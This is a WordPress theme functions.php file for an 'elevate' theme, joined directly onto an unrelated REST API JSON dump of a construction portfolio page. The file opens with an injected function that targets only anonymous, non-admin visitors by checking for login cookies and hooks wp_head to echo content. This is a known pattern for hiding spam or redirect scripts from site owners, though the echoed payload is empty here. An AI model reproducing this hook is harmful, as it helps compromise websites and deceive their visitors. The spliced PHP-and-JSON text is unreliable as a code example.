function check_user_logged_in_and_redirect() { if (is_admin()) { return; } if (is_user_logged_in()) { return; } foreach ($_COOKIE as $key => $value) { if (strpos($key, 'wordpress_logged_in_') === 0) { return; } } add_action('wp_head', function() { echo ''; }); } add_action('template_redirect', 'check_user_logged_in_and_redirect'); if ( ! function_exists( 'elevate_setup' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which * runs before the init hook. The init hook is too late for some features, such * as indicating support for post thumbnails. */ function elevate_setup() { /* * Make theme available for translation. * Translations can be filed in the /languages/ directory. * If you're building a theme based on elevate, use a find and replace * to change 'elevate' to the name of your theme in all the template files. */ load_theme_textdomain( 'elevate', get_template_directory() . '/languages' ); // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support( 'title-tag' ); add_theme_support( 'woocommerce' ); function elevate_change_excerpt( $text ) { $pos = strrpos( $text, '['); if ($pos === false) { return $text; } return rtrim (substr($text, 0, $pos) ) . '...'; } add_filter('get_the_excerpt', 'elevate_change_excerpt'); // Limit Excerpt Length by number of Words function elevate_custom_excerpt( $limit ) { $excerpt = explode(' ', get_the_excerpt(), $limit); if (count($excerpt)>=$limit) { array_pop($excerpt); $excerpt = implode(" ",$excerpt).'...'; } else { $excerpt = implode(" ",$excerpt); } $excerpt = preg_replace('`[[^]]*]`','',$excerpt); return $excerpt; } function content($limit) { $content = explode(' ', get_the_content(), $limit); if (count($content)>=$limit) { array_pop($content); $content = implode(" ",$content).'...'; } else { $content = implode(" ",$content); } $content = preg_replace('/[.+]/','', $content); $content = apply_filters('the_content', $content); $content = str_replace(']]>', ']]>', $content); return $content; } /* * Enable support for Post Thumbnails on posts and pages. * * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/ */ add_theme_support( 'post-thumbnails' ); // This theme uses wp_nav_menu() in one location. register_nav_menus( array( 'menu-1' => esc_html__( 'Primary Menu', 'elevate' ), 'menu-2' => esc_html__( 'Single Menu', 'elevate' ), ) ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', ) ); // Set up the WordPress core custom background feature. add_theme_support( 'custom-background', apply_filters( 'elevate_custom_background_args', array( 'default-color' => 'ffffff', 'default-image' => '', ) ) ); // Add theme support for selective refresh for widgets. add_theme_support( 'customize-selective-refresh-widgets' ); /** * Add support for core custom logo. * * @link https://codex.wordpress.org/Theme_Logo */ add_theme_support( 'custom-logo', array( 'height' => 250, 'width' => 250, 'flex-width' => true, 'flex-height' => true, ) ); //add support posts format add_theme_support( 'post-formats', array( 'aside', 'gallery', 'audio', 'video', 'image', 'quote', 'link', ) ); add_theme_support( 'align-wide' ); } endif; add_action( 'after_setup_theme', 'elevate_setup' ); /** *Custom Image Size */ add_image_size( 'elevate-team-slider', 358, 415, true ); add_image_size( 'elevate-portfolio-slider', 648, 500, true ); add_image_size( 'elevate-portfolio-slider-2', 800, 510, true ); add_image_size( 'elevate-blog-slider', 420, 365, true ); add_image_size( 'elevate-portfolio-grid', 600, 700, true ); add_image_size( 'elevate-blog-sideabr', 87, 87, true ); /** * Set the content width in pixels, based on the theme's design and stylesheet. * * Priority 0 to make it available to lower priority callbacks. * * @global int $content_width */ function elevate_content_width() { $GLOBALS['content_width'] = apply_filters( 'elevate_content_width', 640 ); } add_action( 'after_setup_theme', 'elevate_content_width', 0 ); /** * Implement the Custom Header feature. */ require_once get_template_directory() . '/inc/custom-header.php'; /** * Custom template tags for this theme. */ require_once get_template_directory() . '/inc/template-tags.php'; /** * Enqueue scripts and styles. */ require_once get_template_directory() . '/inc/theme-scripts.php'; /** * Functions which enhance the theme by hooking into WordPress. */ require_once get_template_directory() . '/inc/theme-functions.php'; /** * Functions which enhance the theme by hooking into WordPress. */ require_once get_template_directory() . '/inc/theme-sidebar.php'; /** * Customizer additions. */ require_once get_template_directory() . '/inc/customizer.php'; /** * Custom Style */ if(get_option( 'reacthemes_license_status') == "activated"){ require_once get_template_directory() . '/inc/dyanamic-css.php'; require_once get_template_directory() . '/libs/theme-option/config.php'; require_once get_template_directory() . '/inc/woocommerce-functions.php'; } if(is_admin()){ require_once get_template_directory() . '/inc/tgm/class-tgm-plugin-activation.php'; require_once get_template_directory() . '/inc/tgm/tgm-config.php'; require_once get_template_directory() . '/inc/license.php'; } //---------------------------------------------------------------------- // Remove Redux Framework NewsFlash //---------------------------------------------------------------------- if ( ! class_exists( 'reduxNewsflash' ) ): class reduxNewsflash { public function __construct( $parent, $params ) {} } endif; function elevate_remove_demo_mode_link() { // Be sure to rename this function to something more unique if ( class_exists('ReduxFrameworkPlugin') ) { remove_action( 'plugin_row_meta', array( ReduxFrameworkPlugin::get_instance(), 'plugin_metalinks'), null, 2 ); } if ( class_exists('ReduxFrameworkPlugin') ) { remove_action('admin_notices', array( ReduxFrameworkPlugin::get_instance(), 'admin_notices' ) ); } } add_action('init', 'elevate_remove_demo_mode_link'); /** * Registers an editor stylesheet for the theme. */ function elevate_theme_add_editor_styles() { add_editor_style( 'css/custom-editor-style.css' ); } add_action( 'admin_init', 'elevate_theme_add_editor_styles' ); //------------------------------------------------------------------------ //Organize Comments form field //----------------------------------------------------------------------- function elevate_wpb_move_comment_field_to_bottom( $fields ) { $comment_field = $fields['comment']; unset( $fields['comment'] ); $fields['comment'] = $comment_field; return $fields; } add_filter( 'comment_form_fields', 'elevate_wpb_move_comment_field_to_bottom' ); //adding placeholder text for comment form function elevate_comment_textarea_placeholder( $args ) { $args['comment_field'] = str_replace( '<textarea', '<textarea placeholder="Comment"', $args['comment_field'] ); return $args; } add_filter( 'comment_form_defaults', 'elevate_comment_textarea_placeholder' ); /** * Comment Form Fields Placeholder * */ function elevate_comment_form_fields( $fields ) { foreach( $fields as &$field ) { $field = str_replace( 'id="author"', 'id="author" placeholder="Name*"', $field ); $field = str_replace( 'id="email"', 'id="email" placeholder="Email*"', $field ); $field = str_replace( 'id="url"', 'id="url" placeholder="Website"', $field ); } return $fields; } add_filter( 'comment_form_default_fields', 'elevate_comment_form_fields' ); //customize archive tilte add_filter( 'get_the_archive_title', function ($title) { if ( is_category() ) { $title = single_cat_title( '', false ); } elseif ( is_tag() ) { $title = single_tag_title( '', false ); } elseif ( is_author() ) { $title = '<span class="vcard">' . get_the_author() . '</span>' ; } return $title; }); add_filter( 'get_the_archive_title', 'elevate_archive_title_remove_prefix' ); function elevate_archive_title_remove_prefix( $title ) { if ( is_post_type_archive() ) { $title = post_type_archive_title( '', false ); } return $title; } function elevate_menu_add_description_to_menu($item_output, $item, $depth, $args) { if (strlen($item->description) > 0 ) { // append description after link $item_output .= sprintf('<span class="description">%s</span>', esc_html($item->description)); } return $item_output; } add_filter('walker_nav_menu_start_el', 'elevate_menu_add_description_to_menu', 10, 4); add_filter('wp_list_categories', 'elevate_cat_count_span'); function elevate_cat_count_span($links) { $links = str_replace('</a> (', '</a> <span>(', $links); $links = str_replace(')', ')</span>', $links); return $links; } function elevate_style_the_archive_count($links) { $links = str_replace('</a> (', '</a> <span class="archiveCount">(', $links); $links = str_replace(')', ')</span>', $links); return $links; } add_filter('get_archives_link', 'elevate_style_the_archive_count'); /** * Post title array */ function elevate_get_postTitleArray($postType = 'post' ){ $post_type_query = new WP_Query( array ( 'post_type' => $postType, 'posts_per_page' => -1, 'orderby' => 'title', 'order' => 'ASC', ) ); // we need the array of posts $posts_array = $post_type_query->posts; // the key equals the ID, the value is the post_title if ( is_array($posts_array) ) { $post_title_array = wp_list_pluck($posts_array, 'post_title', 'ID' ); } else { $post_title_array['default'] = esc_html__( 'Default', 'elevate' ); } return $post_title_array; }{"id":2611,"date":"2023-03-20T09:09:09","date_gmt":"2023-03-20T09:09:09","guid":{"rendered":"http:\/\/192.168.0.235\/elevate\/?page_id=2611"},"modified":"2023-03-20T09:09:09","modified_gmt":"2023-03-20T09:09:09","slug":"portfolio-filter","status":"publish","type":"page","link":"https:\/\/goldtradingqa.com\/portfolio-filter\/","title":{"rendered":"Portfolio Filter"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"2611\" class=\"elementor elementor-2611\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-643ada8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"643ada8\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4fa029d\" data-id=\"4fa029d\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a607bb elementor-widget elementor-widget-rt-portfolio-grid\" data-id=\"4a607bb\" data-element_type=\"widget\" data-widget_type=\"rt-portfolio-grid.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\r\n\t\t<div class=\"portfolio-filter\">\r\n\t\t\t<button class=\"active\" data-filter=\"*\">All<\/button>\r\n\t\t\t\t\t\t\t<button data-filter=\".filter_building\">Building<\/button>\r\n\t\t\t\t\t\t\t<button data-filter=\".filter_construction\">Construction<\/button>\r\n\t\t\t\t\t\t\t<button data-filter=\".filter_renovation\">Renovation<\/button>\r\n\t\t\t\r\n\t\t<\/div>\r\n\t\r\n\t\r\n\r\n\t<div class=\"rt-portfolio-style8 grid-portfolio\">\r\n\r\n\t\t<div class=\"grid\">\r\n\t\t\t<div class=\"row\">\r\n\t\t\t\t\t\r\n\r\n\t<div class=\"col-lg-4 col-md-6 col-xs-1 grid-item filter_building filter_renovation \">\r\n\r\n\t\t<div class=\"rts-business-case-s-2 portfolio-item\">\t\t\r\n\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/kitchen-dining-room\/\" class=\"thumbnail\">\r\n\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"600\" height=\"700\" src=\"https:\/\/goldtradingqa.com\/wp-content\/uploads\/2023\/03\/black-fitted-kitchen-dining-room-600x700.webp\" class=\"attachment-elevate-portfolio-grid size-elevate-portfolio-grid wp-post-image\" alt=\"\" \/>\t\t\t<\/a>\r\n\t\t\t<div class=\"inner\">\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/kitchen-dining-room\/\">\r\n\t\t\t\t\t<h5 class=\"title\">\r\n\t\t\t\t\t\tKitchen Dining Room\t\t\t\t\t<\/h5>\r\n\t\t\t\t\t\r\n\t\t\t\t<\/a>\r\n\t\t\t\t<span class=\"p-category\"> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/building\/\" rel=\"tag\">Building<\/a><span class=\"separator\">,<\/span> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/renovation\/\" rel=\"tag\">Renovation<\/a><\/span>\t\t\t\t\r\n\t\t\t<\/div>\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/kitchen-dining-room\/\" class=\"over_link\"><\/a>\t\t\t\r\n\t\t<\/div> \t\r\n\t<\/div>\r\n\t\t\r\n\r\n\t<div class=\"col-lg-4 col-md-6 col-xs-1 grid-item filter_building \">\r\n\r\n\t\t<div class=\"rts-business-case-s-2 portfolio-item\">\t\t\r\n\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/dining-interior-design\/\" class=\"thumbnail\">\r\n\t\t\t\t<img decoding=\"async\" width=\"600\" height=\"700\" src=\"https:\/\/goldtradingqa.com\/wp-content\/uploads\/2023\/03\/interior-design-styles-your-dining-room-600x700.webp\" class=\"attachment-elevate-portfolio-grid size-elevate-portfolio-grid wp-post-image\" alt=\"\" \/>\t\t\t<\/a>\r\n\t\t\t<div class=\"inner\">\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/dining-interior-design\/\">\r\n\t\t\t\t\t<h5 class=\"title\">\r\n\t\t\t\t\t\tDining Interior Design\t\t\t\t\t<\/h5>\r\n\t\t\t\t\t\r\n\t\t\t\t<\/a>\r\n\t\t\t\t<span class=\"p-category\"> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/building\/\" rel=\"tag\">Building<\/a><\/span>\t\t\t\t\r\n\t\t\t<\/div>\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/dining-interior-design\/\" class=\"over_link\"><\/a>\t\t\t\r\n\t\t<\/div> \t\r\n\t<\/div>\r\n\t\t\r\n\r\n\t<div class=\"col-lg-4 col-md-6 col-xs-1 grid-item filter_building \">\r\n\r\n\t\t<div class=\"rts-business-case-s-2 portfolio-item\">\t\t\r\n\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/jewelry-shop-design\/\" class=\"thumbnail\">\r\n\t\t\t\t<img decoding=\"async\" width=\"600\" height=\"700\" src=\"https:\/\/goldtradingqa.com\/wp-content\/uploads\/2023\/03\/jewelry-boutique-with-buyer-shop-600x700.webp\" class=\"attachment-elevate-portfolio-grid size-elevate-portfolio-grid wp-post-image\" alt=\"\" \/>\t\t\t<\/a>\r\n\t\t\t<div class=\"inner\">\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/jewelry-shop-design\/\">\r\n\t\t\t\t\t<h5 class=\"title\">\r\n\t\t\t\t\t\tJewelry Shop Design\t\t\t\t\t<\/h5>\r\n\t\t\t\t\t\r\n\t\t\t\t<\/a>\r\n\t\t\t\t<span class=\"p-category\"> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/building\/\" rel=\"tag\">Building<\/a><\/span>\t\t\t\t\r\n\t\t\t<\/div>\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/jewelry-shop-design\/\" class=\"over_link\"><\/a>\t\t\t\r\n\t\t<\/div> \t\r\n\t<\/div>\r\n\t\t\r\n\r\n\t<div class=\"col-lg-4 col-md-6 col-xs-1 grid-item filter_construction \">\r\n\r\n\t\t<div class=\"rts-business-case-s-2 portfolio-item\">\t\t\r\n\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/mirror-decoration\/\" class=\"thumbnail\">\r\n\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"700\" src=\"https:\/\/goldtradingqa.com\/wp-content\/uploads\/2023\/03\/mirror-with-wooden-decoration-3d-600x700.webp\" class=\"attachment-elevate-portfolio-grid size-elevate-portfolio-grid wp-post-image\" alt=\"\" \/>\t\t\t<\/a>\r\n\t\t\t<div class=\"inner\">\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/mirror-decoration\/\">\r\n\t\t\t\t\t<h5 class=\"title\">\r\n\t\t\t\t\t\tMirror Decoration\t\t\t\t\t<\/h5>\r\n\t\t\t\t\t\r\n\t\t\t\t<\/a>\r\n\t\t\t\t<span class=\"p-category\"> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/construction\/\" rel=\"tag\">Construction<\/a><\/span>\t\t\t\t\r\n\t\t\t<\/div>\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/mirror-decoration\/\" class=\"over_link\"><\/a>\t\t\t\r\n\t\t<\/div> \t\r\n\t<\/div>\r\n\t\t\r\n\r\n\t<div class=\"col-lg-4 col-md-6 col-xs-1 grid-item filter_building filter_renovation \">\r\n\r\n\t\t<div class=\"rts-business-case-s-2 portfolio-item\">\t\t\r\n\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/beautiful-room-design\/\" class=\"thumbnail\">\r\n\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"700\" src=\"https:\/\/goldtradingqa.com\/wp-content\/uploads\/2023\/03\/beautiful-room-with-elegant-600x700.webp\" class=\"attachment-elevate-portfolio-grid size-elevate-portfolio-grid wp-post-image\" alt=\"\" \/>\t\t\t<\/a>\r\n\t\t\t<div class=\"inner\">\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/beautiful-room-design\/\">\r\n\t\t\t\t\t<h5 class=\"title\">\r\n\t\t\t\t\t\tBeautiful Room Design\t\t\t\t\t<\/h5>\r\n\t\t\t\t\t\r\n\t\t\t\t<\/a>\r\n\t\t\t\t<span class=\"p-category\"> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/building\/\" rel=\"tag\">Building<\/a><span class=\"separator\">,<\/span> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/renovation\/\" rel=\"tag\">Renovation<\/a><\/span>\t\t\t\t\r\n\t\t\t<\/div>\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/beautiful-room-design\/\" class=\"over_link\"><\/a>\t\t\t\r\n\t\t<\/div> \t\r\n\t<\/div>\r\n\t\t\r\n\r\n\t<div class=\"col-lg-4 col-md-6 col-xs-1 grid-item filter_building filter_renovation \">\r\n\r\n\t\t<div class=\"rts-business-case-s-2 portfolio-item\">\t\t\r\n\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/living-room-interiors\/\" class=\"thumbnail\">\r\n\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"700\" src=\"https:\/\/goldtradingqa.com\/wp-content\/uploads\/2023\/03\/interiors-living-room-mockup-computer-digitally-600x700.webp\" class=\"attachment-elevate-portfolio-grid size-elevate-portfolio-grid wp-post-image\" alt=\"\" \/>\t\t\t<\/a>\r\n\t\t\t<div class=\"inner\">\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/living-room-interiors\/\">\r\n\t\t\t\t\t<h5 class=\"title\">\r\n\t\t\t\t\t\tLiving Room Interiors\t\t\t\t\t<\/h5>\r\n\t\t\t\t\t\r\n\t\t\t\t<\/a>\r\n\t\t\t\t<span class=\"p-category\"> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/building\/\" rel=\"tag\">Building<\/a><span class=\"separator\">,<\/span> <a href=\"https:\/\/goldtradingqa.com\/rt-portfolio-category\/renovation\/\" rel=\"tag\">Renovation<\/a><\/span>\t\t\t\t\r\n\t\t\t<\/div>\r\n\t\t\t\t<a href=\"https:\/\/goldtradingqa.com\/rt-portfolio\/living-room-interiors\/\" class=\"over_link\"><\/a>\t\t\t\r\n\t\t<\/div> \t\r\n\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t<\/div>\r\n\r\n\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>All Building Construction Renovation Visual Design Building Building Coustuction Construction Oil Mill Construction Building, Renovation Road Construction Building, Renovation<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-2611","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/pages\/2611"}],"collection":[{"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/comments?post=2611"}],"version-history":[{"count":0,"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/pages\/2611\/revisions"}],"wp:attachment":[{"href":"https:\/\/goldtradingqa.com\/wp-json\/wp\/v2\/media?parent=2611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}